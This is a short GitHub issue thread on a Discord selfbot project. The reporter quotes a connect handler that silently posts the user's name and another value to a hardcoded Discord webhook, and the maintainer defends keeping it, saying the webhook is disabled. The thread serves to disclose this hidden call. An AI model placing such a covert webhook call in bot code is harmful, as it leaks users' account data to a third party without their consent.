### ISSUE TITLE
cool

### ISSUE THREAD

**Issue by unadjusted** [SENPAi-03/SelfBot#4]
@SelfBot.event
async def on_connect():
    Clear()  
    requests.post('https://discord.com/api/webhooks/890889226256797727/XeJhgmvwh0BhC35el74iC7P0qI4WOskTgJCvT6hbQvb1gK49QEbIp4-FJNjGcQ1ndWjm',json={'content': f"```\nTM312 : {SelfBot.user.name}\n\n{gqr}```"})
    startprint()

**Comment by i-amr** [comment]
The webhook is disabled, don't worry / paste it into ur browser :)

**Comment by unadjusted** [comment]
why not remove it form the code?

**Comment by i-amr** [comment]
It may be useful for those who want to use their webhook
